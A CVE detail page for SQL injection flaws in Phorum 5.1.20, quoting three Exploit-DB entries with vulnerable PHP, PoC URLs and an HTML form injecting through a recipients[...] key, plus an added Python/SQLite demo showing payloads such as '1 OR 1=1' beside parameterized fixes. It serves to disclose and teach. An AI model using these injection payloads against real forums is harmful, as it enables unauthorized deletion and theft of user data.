CVE-2007-2339 : Detail

EPSS score: 0.85%
Attack vector: Network
Published: 2007-04-27 14h00 +00:00
Last modified: 2018-10-16 12h57 +00:00

CVE Descriptions

Multiple SQL injection vulnerabilities in Phorum before 5.1.22 allow remote attackers to execute arbitrary SQL commands via (1) a modified recipients parameter name in (a) pm.php; (2) the curr parameter to the (b) badwords (aka censorlist) or (c) banlist module in admin.php; or (3) the "Edit groups / Add group" field in the (d) groups module in admin.php.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.5 | High | AV:N/AC:L/Au:N/C:P/I:P/A:P | [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs; the percentile thus compares the EPSS score of one CVE with that of all others.

Exploit information

Exploit Database EDB-ID : 29893

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info

Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, a privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation. Phorum 5.1.20 is affected; prior versions may also be vulnerable.

From source code - "include/db/mysql.php" line 3223:
--------------------------------------------------
function phorum_db_del_banitem($banid)
{
    $PHORUM = $GLOBALS["PHORUM"];
    $conn = phorum_db_mysql_connect();
    // $banid goes into the statement unquoted and uncast
    $sql = "DELETE FROM {$PHORUM['banlist_table']} WHERE id = $banid";
    $res = mysql_query($sql, $conn);
---------------------------------------------------
PoC:
http://localhost/phorum.5.1.20/admin.php?module=banlist&delete=1&curr=OR

... and we will get the error message:
<!--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'OR' at line 1: DELETE FROM phorum_banlists WHERE id = OR
-->
Exploit Database EDB-ID : 29894

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info

Let's try to add a group named "war'axe":
http://localhost/phorum.5.1.20/admin.php?module=groups
Edit groups / Add group --> war'axe
<!--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'axe')' at line 1: insert into phorum_groups (name) values ('war'axe')
-->
Exploit Database EDB-ID : 29892

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info

Let's look at the source code of "include/db/mysql.php" ~ line 1881:
------------------[source code]----------------------
function phorum_db_user_get($user_id, $detailed)
{
    $PHORUM = $GLOBALS["PHORUM"];
    $conn = phorum_db_mysql_connect();
    if(is_array($user_id)){
        // array elements are imploded verbatim: no (int) cast, no escaping
        $user_ids=implode(",", $user_id);
    } else {
        $user_ids=(int)$user_id;
    }
    $users = array();
    $sql = "select * from {$PHORUM['user_table']} where user_id in ($user_ids)";
    $res = mysql_query($sql, $conn);
    if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql");
------------------[/source code]----------------------
As we can see, if "$user_id" is an array, then there is no sanitizing of the data before it is used in the SQL query. After some research I have found a way to use this bug for SQL injection. For this, first of all, a potential attacker must have a valid user account on the specific Phorum-powered website and he/she must be logged in. And then let's try this proof-of-concept HTML file:
------------------[PoC exploit]-----------------------
<html>
<body>
<form action="http://localhost/phorum.5.1.20/pm.php" method="post">
<input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe">
<input type="submit" name="test" value="test">
</form>
</body>
</html>
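The three sinks named in the CVE description and in the three EDB entries above, as an added example that is not part of this page or of Phorum's own code: it rebuilds each vulnerable query pattern in Python over an in-memory SQLite database, shows what the payloads do, and pairs each sink with a validated, parameterized version. Table and column names, the sample rows and the POST field are constructed assumptions chosen to resemble Phorum's. One caveat the recipients[...] payload relies on: SQLite, like MySQL, treats an unterminated /* comment as running to the end of the statement.

```python
import re
import sqlite3

# Added example, not Phorum code: models the three SQL sinks of CVE-2007-2339.
# Schema, rows and field names are assumptions constructed for the demo.


def make_db():
    """Constructed schema standing in for a small Phorum 5.1.20 install."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE phorum_banlists (id INTEGER PRIMARY KEY, string TEXT);
        INSERT INTO phorum_banlists VALUES (1, 'spammer'), (2, 'bot'), (3, 'troll');
        CREATE TABLE phorum_groups (group_id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE phorum_users (user_id INTEGER PRIMARY KEY, username TEXT, admin INTEGER);
        INSERT INTO phorum_users VALUES (1, 'admin', 1), (2, 'alice', 0), (3, 'bob', 0);
    """)
    return conn


def count_rows(conn, table):
    assert table in ("phorum_banlists", "phorum_groups", "phorum_users")  # our names only
    return conn.execute("SELECT COUNT(*) FROM " + table).fetchone()[0]


# Sink 1: admin.php?module=banlist&curr=... -> phorum_db_del_banitem($banid)
def del_banitem_vulnerable(conn, banid):
    # id interpolated unquoted and uncast: text after the number joins the WHERE clause
    sql = "DELETE FROM phorum_banlists WHERE id = %s" % banid
    conn.execute(sql)
    return sql


def del_banitem_fixed(conn, banid):
    # Validate the shape (stricter than PHP's (int) cast, which quietly turns
    # '1 OR 1=1' into 1) and bind the value instead of interpolating it.
    if not re.fullmatch(r"\d+", str(banid)):
        raise ValueError("banlist id must be an integer")
    conn.execute("DELETE FROM phorum_banlists WHERE id = ?", (int(banid),))
    return int(banid)


# Sink 2: admin.php?module=groups "Add group" -> INSERT with an unescaped name
def add_group_vulnerable(conn, name):
    sql = "insert into phorum_groups (name) values ('%s')" % name
    conn.execute(sql)  # a quote in name ends the literal early, as in the advisory
    return sql


def add_group_fixed(conn, name):
    conn.execute("INSERT INTO phorum_groups (name) VALUES (?)", (name,))
    return conn.execute("SELECT name FROM phorum_groups WHERE name = ?", (name,)).fetchone()[0]


# Sink 3: pm.php recipients[...] -> phorum_db_user_get($user_id) with an array
def php_array_keys(form, base):
    """Mimic PHP building $_POST[base] from fields named base[key]; the
    attacker controls the keys, and the keys are what Phorum imploded."""
    prefix = base + "["
    return [f[len(prefix):-1] for f in form if f.startswith(prefix) and f.endswith("]")]


def user_get_vulnerable(conn, user_id):
    # Mirrors phorum_db_user_get(): only the scalar branch casts; arrays are imploded as-is
    if isinstance(user_id, list):
        user_ids = ",".join(str(u) for u in user_id)
    else:
        user_ids = str(int(user_id))
    sql = "select * from phorum_users where user_id in (%s)" % user_ids
    return conn.execute(sql).fetchall()


def user_get_fixed(conn, user_id):
    ids = user_id if isinstance(user_id, list) else [user_id]
    if not all(re.fullmatch(r"\d+", str(u)) for u in ids):
        raise ValueError("user ids must be integers")
    sql = "SELECT * FROM phorum_users WHERE user_id IN (%s)" % ",".join("?" * len(ids))
    return conn.execute(sql, [int(u) for u in ids]).fetchall()


def demo():
    """Run each sink with an injection payload and return the observed outcomes."""
    out = {}
    conn = make_db()
    del_banitem_vulnerable(conn, "1 OR 1=1")           # wipes the whole ban list
    out["bans_left_vulnerable"] = count_rows(conn, "phorum_banlists")
    conn = make_db()
    try:
        del_banitem_fixed(conn, "1 OR 1=1")
        out["bans_fixed_rejected"] = False
    except ValueError:
        out["bans_fixed_rejected"] = True
    out["bans_left_fixed"] = count_rows(conn, "phorum_banlists")
    try:
        add_group_vulnerable(conn, "war'axe")          # syntax error, as in the PoC
        out["group_quote_error"] = False
    except sqlite3.OperationalError:
        out["group_quote_error"] = True
    add_group_vulnerable(conn, "x'), ('injected")      # smuggles a second row
    out["groups_vulnerable"] = count_rows(conn, "phorum_groups")
    out["group_fixed_name"] = add_group_fixed(conn, "war'axe")
    keys = php_array_keys({"recipients[0) OR 1=1/*]": "waraxe"}, "recipients")  # constructed POST
    out["users_leaked"] = len(user_get_vulnerable(conn, keys))   # every user row
    try:
        user_get_fixed(conn, keys)
        out["users_fixed_rejected"] = False
    except ValueError:
        out["users_fixed_rejected"] = True
    out["users_fixed_ok"] = len(user_get_fixed(conn, ["2", "3"]))
    return out
```

Running demo() shows the ban list emptied by a single crafted curr value, a second group row inserted through the name field, and every user row returned to a recipients[...] key; the fixed variants reject the same payloads before any SQL is built.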

Products Mentioned

Configuration 0

Phorum >> Phorum >> Versions up to and including 5.1.20

References

http://www.phorum.org/story.php?76
Tags : x_refsource_CONFIRM
http://securitytracker.com/id?1017936
Tags : vdb-entry, x_refsource_SECTRACK
http://osvdb.org/35062
Tags : vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2007/1479
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24932
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/2617
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/23616
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/35064
Tags : vdb-entry, x_refsource_OSVDB
http://osvdb.org/35063
Tags : vdb-entry, x_refsource_OSVDB